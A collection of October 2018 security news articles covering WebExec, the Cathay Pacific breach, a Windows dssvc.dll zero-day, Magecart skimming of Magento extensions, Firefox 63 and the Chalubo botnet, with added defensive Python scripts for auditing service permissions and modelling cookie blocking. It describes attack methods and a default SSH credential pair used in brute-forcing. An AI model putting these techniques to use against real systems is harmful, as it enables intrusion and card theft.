The vulnerability affects all Cisco Webex Meetings Desktop App releases prior to 33.6.0, and Cisco Webex Productivity Tools Releases 32.6.0 and later prior to 33.0.5, when running on a Microsoft Windows end-user system.


Bowes and McJunkin dubbed the issue WebExec and explained that it is a remote vulnerability in a client application that does not even listen on a port.

The experts pointed out that the installation of the WebEx client also includes WebExService, a Windows service that can execute arbitrary commands as SYSTEM.

“WebExec is a vulnerability in, as the name implies, Cisco’s WebEx client software. This is a pretty unique vulnerability, because it’s a remote vulnerability in a client application that doesn’t even listen on a port.” wrote the experts.

“The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Windows' remote service interface (except on Windows 10, which requires an administrator login).”

The flaw was discovered on July 24, 2018, and it was reported to Cisco on August 6, 2018. On October 24, 2018, the company released the advisory.

In order to allow admins and users to check and exploit the flaw, the security duo created Nmap and Metasploit scripts.

According to Bowes, the exploitation of the flaw is very easy.

“exploiting the vulnerability is actually easier than checking for it!” wrote Bowes.

“The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by Webex, the execution will halt.”
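
The root cause the researchers describe, a service whose DACL lets any local or domain user start it, is something an administrator can check for directly: `sc sdshow <service>` prints the service's security descriptor in SDDL, and a descriptor that grants SERVICE_START (the RP token) or SERVICE_CHANGE_CONFIG (DC) to Everyone, Authenticated Users or similar is the weakness. The script below is an added example, not Counter Hack's or Cisco's code. DEFAULT_SDDL is a typical default service descriptor; WEAK_SDDL is constructed to match the description above (Authenticated Users can start the service), since the page does not publish WebExService's real descriptor. On Windows, main() evaluates the live output of `sc sdshow`; elsewhere it evaluates the samples.

```python
"""Check a Windows service DACL for the weakness WebExec describes: broad
principals allowed to start, or reconfigure, the service.

Added example, not Counter Hack's or Cisco's code. WEAK_SDDL is constructed
to match the description "any local or domain user can start the process".
"""
import re
import subprocess
import sys

# SDDL rights tokens that let a caller run code through a service.
DANGEROUS_RIGHTS = {
    "RP": "SERVICE_START",
    "DC": "SERVICE_CHANGE_CONFIG",  # repoint the binary path, then start it
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
    "GX": "GENERIC_EXECUTE",        # includes SERVICE_START on service objects
}
# The same rights as access-mask bits, for ACEs written as a hex mask.
DANGEROUS_BITS = {
    0x00000010: "SERVICE_START",
    0x00000002: "SERVICE_CHANGE_CONFIG",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
}
# Principals that amount to "anyone who can log on": aliases and well-known SIDs.
BROAD_PRINCIPALS = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "BU": "Users", "S-1-5-32-545": "Users",
    "IU": "Interactive", "S-1-5-4": "Interactive",
    "DU": "Domain Users",
}

DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPLOCRRC;;;AU)")   # constructed: Authenticated Users may start it


def parse_dacl(sddl: str) -> list:
    """ACEs of the DACL as (type, flags, rights, sid); the SACL after S: is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        fields = ace.split(";")
        if len(fields) >= 6:
            aces.append((fields[0], fields[1], fields[2], fields[5]))
    return aces


def dangerous_rights(rights: str) -> set:
    """Named dangerous rights in an ACE rights field, written as tokens or a hex mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for bit, name in DANGEROUS_BITS.items() if mask & bit}
    return {DANGEROUS_RIGHTS[t] for t in re.findall(r"[A-Z]{2}", rights) if t in DANGEROUS_RIGHTS}


def weak_service_aces(sddl: str) -> list:
    """(principal, right) pairs where an allow ACE gives a broad principal a dangerous right."""
    findings = []
    for ace_type, _flags, rights, sid in parse_dacl(sddl):
        if ace_type == "A" and sid in BROAD_PRINCIPALS:   # deny ACEs are not evaluated here
            for right in sorted(dangerous_rights(rights)):
                findings.append((BROAD_PRINCIPALS[sid], right))
    return findings


def main(argv=None) -> int:
    argv = sys.argv[1:] if argv is None else argv
    if sys.platform != "win32":
        for name, sddl in (("DEFAULT_SDDL", DEFAULT_SDDL), ("WEAK_SDDL", WEAK_SDDL)):
            print(name, weak_service_aces(sddl) or "no broad principal can start/reconfigure")
        return 0
    service = argv[0] if argv else "WebExService"
    sddl = subprocess.run(["sc", "sdshow", service], capture_output=True, text=True).stdout.strip()
    findings = weak_service_aces(sddl)
    for principal, right in findings:
        print(f"[!] {service}: {principal} holds {right}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main())
```

In the default descriptor, Interactive and Service users only get query rights (CC, LC, SW, LO, CR, RC), so nothing is reported; the constructed weak descriptor adds RP for Authenticated Users and is flagged. Note that this check looks only at who may start the service; Cisco's fix, as the researchers describe it, left the start permission in place and instead has the service refuse to run unsigned executables, so a patched WebExService can still show a permissive DACL.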

Cathay Pacific Hit by Data Leak Affecting 9.4M Passengers
25.10.2018 securityweek

Hong Kong flag carrier Cathay Pacific said Wednesday it had suffered a major data leak affecting up to 9.4 million passengers.

The airline admitted data including passport numbers, identity card numbers, email addresses and credit card details was accessed.

"We are in the process of contacting affected passengers, using multiple communications channels, and providing them with information on steps they can take to protect themselves," Cathay Pacific Chief Executive Officer Rupert Hogg said in a statement on the airline's website.

"We have no evidence that any personal data has been misused."

Cathay said it had launched an investigation and alerted the police after an ongoing IT operation revealed unauthorised access to systems containing the passenger data of up to 9.4 million people.

Hogg added: "The following personal data was accessed: passenger name, nationality, date of birth, phone number, email, address, passport number, identity card number, frequent flyer programme membership number, customer service remarks, and historical travel information."

The CEO also revealed 403 expired credit card numbers and 27 credit card numbers with no CVV were accessed.

"The combination of data accessed varies for each affected passenger," he said.

The leak comes as the troubled airline battles to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.

It booked its first back-to-back annual loss in its seven-decade history in March, and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.

Hogg did not mention financial compensation for passengers affected by the data leak, but British Airways pledged to compensate customers when the UK flag carrier suffered a data hack last month.

BA revealed in September that personal and financial details of about 380,000 customers who booked flights on the group's website and mobile phone app over several weeks had been stolen.

The revelation came just a few months after the European Union tightened data protection laws with the so-called General Data Protection Regulation (GDPR).

CEO Alex Cruz said the firm had been the victim of a "malicious, criminal attack on our website".

The airline took out full-page adverts in UK newspapers to apologise to customers, while the share price of parent group IAG was hit.

Exploit for New Windows Zero-Day Published on Twitter
25.10.2018 securityweek
Exploit  Vulnerability

A new zero-day vulnerability in Windows was made public on Twitter by the same researcher who published an exploit for a bug in the Windows Task Scheduler at the end of August.

The newly revealed security flaw impacts the Microsoft Data Sharing library dssvc.dll, and can be exploited by attackers who already have access to the affected system.

The researcher who found the bug, and who goes by the online handle of SandboxEscaper, also published a proof-of-concept (PoC) on GitHub. The code deletes files from the system that only admins would normally have the permission to delete and causes the system to crash.

“Not the same bug I posted a while back, this doesn't write garbage to files but actually deletes them.. meaning you can delete application dll's and hope they go look for them in user write-able locations. Or delete stuff used by system services c:\windows\temp and hijack them,” SandboxEscaper says.

The vulnerability impacts only the latest Windows versions, as the Data Sharing Service was introduced in Windows 10 (Windows Server 2016 and Server 2019 are also affected). Cyber-security expert Kevin Beaumont explains that the exploit abuses “a new Windows service not checking permissions again.”

“This is an elevation of privilege zero-day vulnerability in Microsoft's Data Sharing Service (dssvc.dll), which is used to broker data between applications,” Tom Parsons, Head of Research at Tenable, told SecurityWeek in an emailed comment.

Given that Windows 10 is the second most prevalent Microsoft operating system after Windows 7, the vulnerability could prove attractive to attackers, he suggests.

“To put the threat into perspective, an attacker would already need access to the system or combine it with a remote exploit to leverage the vulnerability. This could be exploited to facilitate lateral movement within an organization or even potentially destructive purposes - such as deletion of key system files rendering a system inoperable,” Parsons says.

Exploitation of this vulnerability, however, is not that easy, as SandboxEscaper admitted from the start. As Beaumont points out, the bug might be “fairly difficult to exploit in a meaningful way.” The most likely scenario would involve targeting OEM drivers, but that is not practical, he says.

Mitja Kolsek, CEO of ACROS Security and co-founder of 0patch, was among the first to confirm that the published PoC works. Within hours, however, the 0patch team came up with a micropatch for the bug. A micropatch for Windows Server 2016 was also announced.


It’s not surprising that 0patch released a fix so fast, as the community is focused on delivering small patches for bugs that vendors haven’t had time to address yet.

At the end of August, they released a micropatch for the Windows Task Scheduler zero-day found by SandboxEscaper. More recently, they released a fix for a Microsoft JET Database Engine flaw that Trend Micro's Zero Day Initiative (ZDI) made public in late September. In fact, they addressed the issue twice, as Microsoft’s official patch was incomplete.

Check Point Acquires Dome9 for $175 Million
25.10.2018 securityweek

Enterprise cybersecurity solutions provider Check Point Software Technologies on Wednesday announced the acquisition of Dome9, a company that specializes in cloud security infrastructure.

Check Point representatives told SecurityWeek that Dome9 was acquired for $175 million in cash, along with restricted stock units (RSUs) and stock options.

By acquiring Dome9, Check Point hopes to enhance its Infinity architecture and cloud security offering by adding advanced active policy enforcement and multi-cloud protection capabilities.

Founded in 2011, Israel-based Dome9 provides security and compliance solutions for multi-cloud deployments across Microsoft Azure, AWS, and Google Cloud. The company’s platform includes capabilities such as security posture visualization, identity protection, compliance and governance automation, and cloud traffic and event analysis.

The company says its customers include many Fortune 1000 enterprises, global system integrators, and managed service providers.

“Dome9 and Check Point’s CloudGuard together provide the best cloud security solution in the industry. Dome9’s platform will add rich cloud management and active policy enforcement capabilities to Check Point’s Infinity Architecture, particularly complementing the CloudGuard security product family and make our broad solution even more differentiated in the rapidly moving Cyber Security environment,” said Gil Shwed, CEO of Check Point.

“As 5th generation cyber attacks increasingly target enterprise cloud environments, so our Gen V cyber security solution must effectively protect this vector. This acquisition will enhance our ability to deliver the benefits of Cloud with the critical security that must extend from the networks, endpoints and data centers to the Cloud and Mobile enterprise-wide,” Shwed added.

Cathay Pacific data breach affecting 9.4 million passengers
25.10.2018 securityaffairs

Cathay Pacific Airways Limited, the flag carrier of Hong Kong, had suffered a major data leak affecting up to 9.4 million passengers.
Cathay Pacific Airways Limited, the flag carrier of Hong Kong, admitted having suffered a major data leak affecting up to 9.4 million passengers.

Exposed data includes passport numbers, identity card numbers, email addresses and credit card details; the information exposed varies for each affected passenger.

“As part of our ongoing IT security processes, we have discovered unauthorised access to some of our passenger data. Upon discovery, we took immediate action to contain the event, and further strengthen our IT security measures.” reads the official statement published by the airline.

The IT staff at Cathay discovered unauthorized access to systems containing the passenger data of up to 9.4 million people. The attackers also accessed 403 expired credit card numbers and 27 credit card numbers without CVV.

The company is notifying the affected passengers through multiple channels.

“We are in the process of contacting affected passengers, using multiple communications channels, and providing them with information on steps they can take to protect themselves,” said Cathay Pacific Chief Executive Officer Rupert Hogg.

“We have no evidence that any personal data has been misused.”

“The following personal data was accessed: passenger name, nationality, date of birth, phone number, email, address, passport number, identity card number, frequent flyer programme membership number, customer service remarks, and historical travel information.” Hogg added.


The company immediately reported the incident to the authorities and launched an investigation.

At the time of writing there is no news about financial compensation for affected passengers.

Anyone who believes they may be affected can contact Cathay Pacific in the following ways:

Via the dedicated website – infosecurity.cathaypacific.com – which provides information about the event and what to do next
Via Cathay Pacific’s dedicated call centre available after 12:30/25OCT (GMT+8) (toll free numbers are available on infosecurity.cathaypacific.com)
Email Cathay Pacific at infosecurity@cathaypacific.com

Recently, personal and payment card information of 380,000 British Airways customers was stolen by Magecart hackers, and the company pledged to compensate customers.

Magecart hackers change tactic and target vulnerable Magento extensions
25.10.2018 securityaffairs

Magecart cybercrime gang made the headlines again, the cyber criminal gang is now targeting vulnerable Magento Extensions.
The Magecart cybercrime gang has switched tactics: instead of compromising large websites or the third-party services they use, it is now targeting vulnerable Magento extensions.

In previous campaigns the attackers customized the attack for each victim, tailoring the code to each target site according to the information gathered in an initial reconnaissance phase. To avoid detection, Magecart hackers injected their code only into specific pages.

In the last months, the gang hit several major platforms, including British Airways, Newegg, Ticketmaster, and Feedify.

The new attack was detailed by the researcher Willem de Groot, the hackers are now exploiting zero-day vulnerabilities in popular store extension software in order to inject skimmer scripts.

“Online credit card theft has been all over the news: criminals inject hidden card stealers on legitimate checkout pages. But how are they able to inject anything in the first place? As it turns out, thieves are massively exploiting unpublished security flaws (aka 0days) in popular store extension software.” wrote the expert.

“While the extensions differ, the attack method is the same: PHP Object Injection (POI).”

Now attackers leverage PHP Object Injection (POI) by abusing PHP’s unserialize() function in order to compromise websites. With this attack method, they are able to modify the database or any JavaScript file.

According to de Groot, many popular PHP applications continue to use unserialize(), but while Magento has replaced most of the vulnerable functions, many of its extensions are still flawed.

“This attack vector abuses PHP’s unserialize() function to inject their own PHP code into the site.” continues the researcher.

“With that, they are able to modify the database or any Javascript files. As of today, many popular PHP applications still use unserialize(). Magento replaced most of the vulnerable functions by json_decode() in patch 8788, but many of its popular extensions did not.”

The attackers appear to have analyzed a large number of extensions and discovered numerous POI vulnerabilities; they are now scanning the Internet for Magento installs that use these extensions.

Once the attackers have found a vulnerable store they exploit the zero-day to insert a JavaScript payment overlay customized for the specific target site.

“Once any of the probes above is successful, a malicious actor will come back and insert a customized Javascript payment overlay for the specific site. This works for sites that have external payments, or no credit card payments at all, because a fake credit card payment section is inserted.” states the researcher.

“Once a user enters his CC details and clicks submit, the fake credit card form disappears and the unsuspecting (?) user will likely try again. The fake form will not show a second time, because a cookie is set to prevent that.”

Further details are included in the analysis published by the researcher.

Magecart Hackers Now Targeting Vulnerable Magento Extensions
25.10.2018 securityweek
Incident  Vulnerability

After compromising large websites, or third-party services those websites use, to steal credit card information, the Magecart hackers have now turned to vulnerable Magento extensions.

As part of the attack, the Magecart threat actors insert a small piece of JavaScript code onto the compromised website to steal all of the credit card and associated information that users enter there.

The hackers only inject their code after thorough reconnaissance, as the code in each attack is specifically tailored for the targeted site and blends in with the rest of the domain’s resources. The code is injected only into specific pages, to remain unnoticed but ensure efficiency.

Active for a couple of years, the hackers have only recently started targeting large platforms, including British Airways, Ticketmaster, Newegg, and cloud service provider Feedify, which has attracted a lot of attention. Last month, the operation hit Shopper Approved.

Now, security researcher Willem de Groot reveals that the attackers have switched to targeting unpublished vulnerabilities in popular store extension software.

The hackers seek to compromise websites through PHP Object Injection (POI) by abusing PHP’s unserialize() function. This provides them with the ability to modify the database or any JavaScript file, the researcher says.

Many popular PHP applications continue to use unserialize(), de Groot reveals. While Magento has replaced most of the vulnerable functions, many of its extensions did not.

“It appears that attackers have amassed a large number of extensions and found numerous POI vulnerabilities. And they are now probing Magento stores in the wild for these extensions,” the researcher, who published a list of the impacted extensions, explains.

Once a probe is successful, the malicious actors return to the impacted website and insert a JavaScript payment overlay customized for that site. The attack works on sites that have external or no credit card payments, because it inserts a fake credit card payment section.

As soon as the user enters their credit card data and submits it, the fake payment form disappears. The user is likely to try entering their information again, but the fake form is only shown once, because a cookie is set to ensure that. The code, de Groot reveals, uses a two-step payment exfiltration method.

Firefox 63 Blocks Tracking Cookies
25.10.2018 securityweek

Firefox 63 was released on Tuesday with a new cookie policy meant to prevent cross-site tracking by effectively blocking cookies and other site data from third-party tracking resources.

The move was announced in August, when the feature entered the initial testing phase. Now, all desktop versions of Firefox include the experimental cookie policy that not only protects against cross-site tracking, but also aims to minimize site breakage associated with traditional cookie blocking.

The new policy was added as part of the Enhanced Tracking Protection feature, which represents Mozilla’s new effort to protect users from being tracked across the websites they access.

“We aim to bring these protections to all users by default in Firefox 65,” Mozilla says.

The new policy effectively blocks domains classified as trackers from accessing the storage on the user’s device. Thus, such domains cannot access or set cookies or other site data when loaded in a third-party context.

Trackers are also blocked from accessing other APIs that could allow them to communicate cross-site, such as the Broadcast Channel API. Firefox uses the Tracking Protection list maintained by Disconnect to know which domains are classified as trackers.

Blocking third-party cookies may break websites, especially if the sites integrate third-party content. To prevent issues, Mozilla added heuristics to Firefox to automatically grant time-limited storage access under certain conditions. Such permissions are added on a site-by-site basis, and only for access to embedded content that receives user interaction.

More structured access will be available through a Storage Access API that is now implemented in Firefox Nightly for testing. Also implemented in Safari, the API is a proposed addition to the HTML specification. It allows trackers to explicitly request storage access when loaded in a third-party context.

To enable the new policy in Firefox, users should go to Options > Privacy & Security and select Third-Party Cookies in the Content Blocking section, then select Trackers (recommended). Users, however, can still take advantage of Tracking Protection to block all tracking loads. They simply need to set All Detected Trackers to Always.
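
The decision the new policy makes for each resource load follows from the description above: storage is denied only when the resource is third-party to the top-level site and its domain is on the tracker list, and a site-scoped, time-limited grant can override that after user interaction. The model below is an added example, not Firefox's implementation. Its PUBLIC_SUFFIXES and TRACKERS sets are small constructed stand-ins for the Public Suffix List and Disconnect's list, and the grant lifetime is an assumed default, since the page gives neither the real duration nor the exact interaction heuristics; "third party" is judged by comparing registrable domains (eTLD+1), which is why a tiny suffix list is needed at all.

```python
"""Model of the Firefox 63 third-party cookie policy described above.

Added example, not Firefox's code. PUBLIC_SUFFIXES, TRACKERS and the grant
lifetime are constructed stand-ins for the real lists and heuristics.
"""
import time
from urllib.parse import urlsplit

PUBLIC_SUFFIXES = {"com", "org", "net", "co.uk", "github.io"}   # constructed subset
TRACKERS = {"tracker.example", "ads.example.net"}                # constructed subset


def registrable_domain(host: str) -> str:
    """eTLD+1 of a host: the label just above the longest matching public suffix."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[max(i - 1, 0):])
    return ".".join(labels[-2:])          # unknown suffix: fall back to the last two labels


def is_tracker(host: str) -> bool:
    """A host is a tracker if it, or any parent domain, is on the tracker list."""
    labels = host.lower().split(".")
    return any(".".join(labels[i:]) in TRACKERS for i in range(len(labels)))


class StoragePolicy:
    """Decides whether a resource loaded under a top-level site may use cookies/storage."""

    def __init__(self, grant_ttl_seconds: int = 30 * 24 * 3600):
        self.ttl = grant_ttl_seconds          # assumed lifetime; not a value from the page
        self.grants = {}                      # (resource site, top-level site) -> expiry

    @staticmethod
    def _sites(resource_url: str, top_url: str):
        return (registrable_domain(urlsplit(resource_url).hostname),
                registrable_domain(urlsplit(top_url).hostname))

    def user_interacted(self, resource_url: str, top_url: str, now=None) -> None:
        """Heuristic grant: embedded content from this site received user interaction."""
        self.grants[self._sites(resource_url, top_url)] = (time.time() if now is None else now) + self.ttl

    def storage_allowed(self, resource_url: str, top_url: str, now=None) -> bool:
        resource_site, top_site = self._sites(resource_url, top_url)
        if resource_site == top_site:
            return True                       # first-party context: the policy never applies
        if not is_tracker(urlsplit(resource_url).hostname):
            return True                       # third party, but not classified as a tracker
        expiry = self.grants.get((resource_site, top_site))   # grants are per top-level site
        return expiry is not None and (time.time() if now is None else now) < expiry


if __name__ == "__main__":
    policy = StoragePolicy(grant_ttl_seconds=60)
    top = "https://shop.example.com/checkout"
    for url in ("https://static.shop.example.com/app.js",
                "https://cdn.example.org/lib.js",
                "https://sub.tracker.example/pixel.gif"):
        print(url, "->", "storage allowed" if policy.storage_allowed(url, top, now=0) else "blocked")
    policy.user_interacted("https://sub.tracker.example/widget", top, now=0)
    print("after interaction:", policy.storage_allowed("https://sub.tracker.example/pixel.gif", top, now=30))
```

Two details the model makes visible: a CDN on a different registrable domain is third-party but untouched unless it is on the list, and a grant earned on one top-level site does not carry over to another, which is the site-by-site scoping described above.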

Firefox 63 was also released with patches for 14 vulnerabilities, including two memory safety bugs rated “critical severity.” Additionally, it addressed three high risk bugs, four medium severity issues, and five low risk flaws.

The new browser release was also supposed to completely remove trust in Symantec certificates but, after learning that over 1% of the top 1,000,000 websites still use such certificates, Mozilla decided to delay the move.

Google Blocks New Ad Fraud Scheme
25.10.2018 securityweek

Google says it recently blocked a new ad fraud scheme spread across a large number of applications and websites and monetizing with numerous advertising platforms.

Previously, the company had blocked websites from its ad network for violating its policies, but now it also took action against applications that were involved in the fraud scheme, after being tipped off by BuzzFeed News.

Not only did the web search company ensure that these apps can no longer monetize with Google, it also blacklisted additional apps and websites outside of its ad network, “to ensure that advertisers using Display & Video 360 (formerly known as DoubleClick Bid Manager) do not buy any of this traffic.”

The company estimates that “the dollar value of impacted Google advertiser spend across the apps and websites involved in the operation is under $10 million.” Basically, money was spent on invalid traffic on inventory from non-Google, third-party ad networks.

The web-based traffic was generated by a small to medium-sized botnet that has been tracked for several years as TechSnab. The number of infections has decreased significantly after the Chrome Cleanup tool started prompting users to uninstall the threat, Google says.

The malware, which has common IP-based cloaking, data obfuscation, and anti-analysis defenses, creates hidden browser windows that visit web pages to artificially inflate ad revenue. Traffic is directed to a ring of websites that have been specifically designed for this operation.

The operation monetized through a large number of ad exchanges. According to Google, as many as 150 exchanges, supply-side platforms (SSPs) or networks may have sold inventory from these websites. The operators had hundreds of accounts across 88 different exchanges, the search giant reveals.

Mobile apps were impacted the most, monetizing via AdMob. Traffic from these apps appears as a combination of organic user traffic and artificially inflated ad traffic, including that generated by hidden ads.

“Additionally, we found the presence of several ad networks, indicating that it's likely many were being used for monetization. We are actively tracking this operation, and continually updating and improving our enforcement tactics,” Google says.

In addition to taking action to disrupt this threat, including the takedown of command and control infrastructure that powers the associated botnet, Google has shared information with partners across the ecosystem, so they too can harden defenses and minimize impact.

“This effort highlights the importance of collaborating with others to counter bad actors. Ad fraud is an industry-wide issue that no company can tackle alone. We remain committed to fighting invalid traffic and ad fraud threats such as this one, both to protect our advertisers, publishers, and users, as well as to protect the integrity of the broader digital advertising ecosystem,” Google notes.

Pentagon Launches Continuous Bug Bounty Program
25.10.2018 securityweek

The Department of Defense announced on Wednesday that its “Hack the Pentagon” bug bounty program will run all year long and will target the organization’s high-value assets.

The continuous Hack the Pentagon project is powered by crowdsourced security platform Bugcrowd, which is the third Silicon Valley company awarded a contract by the DoD for bug bounty programs.

HackerOne has helped the department run time-limited bug bounty programs, such as the first Hack the Pentagon, Hack the Air Force, Hack the Marine Corps, and Hack the Army.

Synack, which offers managed bug bounty services, was contracted by the Pentagon to provide assistance for a private program focusing on sensitive IT assets and open only to highly vetted researchers.

The year-long program targets high-value assets, including hardware and physical systems, and its goal is to help the DoD collaborate with vetted researchers throughout the development lifecycle of systems, many of which are regularly updated.

The Pentagon says it will also launch other bug bounty programs for public-facing websites.

“As cyber threats persist, the Defense Department is working to identify innovative approaches to bolster security, combat malicious activities, and build trusted private sector partnerships to counter threats. Hack the Pentagon bug bounties are designed to identify and resolve security vulnerabilities across targeted DOD websites and assets and pay cash to highly vetted security researchers or ‘ethical hackers’ to discover and disclose bugs,” the DoD said.

Yahoo to Pay $50M, Other Costs for Massive Security Breach
25.10.2018 securityweek

Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.

The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.

It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.

Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.

Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.

About 3 billion Yahoo accounts were hit by hackers that included some linked to Russia by the FBI. The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.

Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.

The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.

Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.

The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.

The lawyers for Yahoo’s accountholders praised the settlement as a positive outcome, given the uncertainty of what might have happened had the case headed to trial.

Estimates of damages caused by security breaches vary widely, with experts asserting the value of personal information held in email accounts can range from $1 to $8 per account. Those figures suggest Yahoo could have faced a bill of more than $1 billion had it lost the case.

But Yahoo had disputed those damages estimates and noted many of its accountholders submitted false information about their birthdates, names and other parts of their lives when they set up their email.

The lawyers representing Yahoo accountholders have a big incentive to get the settlement approved. Yahoo will pay them up to $37.5 million in fees and expenses if it goes through.

Oath, the Verizon subsidiary that now oversees Yahoo, declined to comment.

A hearing to approve the preliminary settlement is scheduled for Nov. 29 before U.S. District Judge Lucy Koh in San Jose. If approved, notices will be emailed to affected accountholders and published in People and National Geographic magazines.

SandboxEscaper expert is back and disclosed a new Windows Zero-Day
25.10.2018 securityaffairs

The security researcher SandboxEscaper has released proof-of-concept exploit code for a new Windows zero-day; Windows users are now exposed to attacks.

The security researcher using the Twitter handle @SandboxEscaper is back and has released the proof-of-concept exploit code for a new Windows zero-day vulnerability.

At the end of August, the same researcher disclosed the details of a zero-day privilege escalation vulnerability in the Microsoft Windows Task Scheduler that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

Now SandboxEscaper published a tweet containing a link to a Github page hosting a proof-of-concept (PoC) exploit for a privilege escalation vulnerability affecting Microsoft Data Sharing (dssvc.dll).

The Data Sharing Service is a local service that runs under the LocalSystem account with extensive privileges; it provides data brokering between applications.

https://github.com/SandboxEscaper/randomrepo/blob/master/DeleteBug1.rar … Here's a low quality bug that is a pain to exploit.. still unpatched. I'm done with all this anyway. Probably going to get into problems because of being broke now.. but whatever.

4:39 PM - Oct 23, 2018

Security experts note that the way SandboxEscaper disclosed the flaw has left all Windows users vulnerable to attack, at least until Microsoft addresses it. The next round of security updates is scheduled for November 13, 2018.

The vulnerability could be exploited by an attacker with low privileges to elevate them on the vulnerable system. The expert shared the PoC exploit code (deletebug.exe), which deletes critical system files, an operation that normally requires admin-level privileges.

“Not the same bug I posted a while back, this doesn’t write garbage to files but actually deletes them.. meaning you can delete application dll’s and hope they go look for them in user write-able locations. Or delete stuff used by system services c:\windows\temp and hijack them,” SandboxEscaper explained.

Security experts noticed that the flaw only affects Windows 10 and recent versions of Windows Server editions because older versions of the Microsoft operating systems don’t implement the Microsoft Data Sharing service.

The popular researcher Will Dormann successfully tested the PoC exploit on a fully patched Windows 10 system running a build that included the October 2018 security updates, as well as on Server 2016 and Server 2019.

Experts fear that the release of the PoC could help attackers in actively exploiting the flaw in the wild.

DDoS-Capable IoT Botnet 'Chalubo' Rises
24.10.2018 securityweek

A new piece of malware is targeting Internet of Things (IoT) devices in an attempt to ensnare them into a botnet capable of launching distributed denial-of-service (DDoS) attacks, Sophos Labs reports.

Dubbed Chalubo (ChaCha-Lua-bot), the malware incorporates code from the Xor.DDoS and Mirai families, but also brings improvements in the form of anti-analysis techniques. Specifically, the authors have encrypted both the main component and its corresponding Lua script using the ChaCha stream cipher.

In late August, the attackers were observed using three malicious components for the threat, namely a downloader, the main bot, and the Lua command script. The bot ran only on systems with an x86 architecture.

Several weeks ago, the cybercriminals started using the Elknot dropper to deliver the rest of Chalubo. More importantly, Sophos Labs security researchers observed a variety of bot versions, designed to target different architectures, including 32-bit and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, and PowerPC.

Due to the expanded target list, Sophos has concluded that the malware author might have been testing the bot at first, but that the trial has ended and an uptick in activity from this new threat is to be expected.

In early September, the malware was being distributed through brute-force attacks on SSH servers. The attackers were using the root:admin credential pair to compromise devices, Sophos reveals, based on an attack on their honeypot.

“This bot demonstrates increased complexity compared to the standard Linux bots we typically see delivered from these types of attacks. Not only are the attackers using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware,” the researchers note.

One of the files the malware’s downloader would drop is a script, and the manner in which this action is performed is an exact match to the behavior of the Xor.DDoS family. In fact, it appears that Chalubo copied the code responsible for persistence from the older malware.

Furthermore, the researchers discovered that the Chalubo authors also copied a few code snippets from Mirai, including some of the randomizing functions.

However, the majority of functional code in the new malware family is new, as the author mainly focused on the Lua handling for performing DDoS attacks with DNS, UDP, and SYN floods.

The bot’s Lua script was designed to call home to the command and control (C&C) server to provide details on the infected machine and to receive further instructions. It would also download, decrypt, and execute whatever Lua script it finds.

“Since the primary method of this bot infecting systems is through the use of common username and password combinations against SSH servers, we recommend that sysadmins of SSH servers (including embedded devices) change any default passwords on those devices, because the brute force attempts to cycle through common, publicly known default passwords,” Sophos concludes.
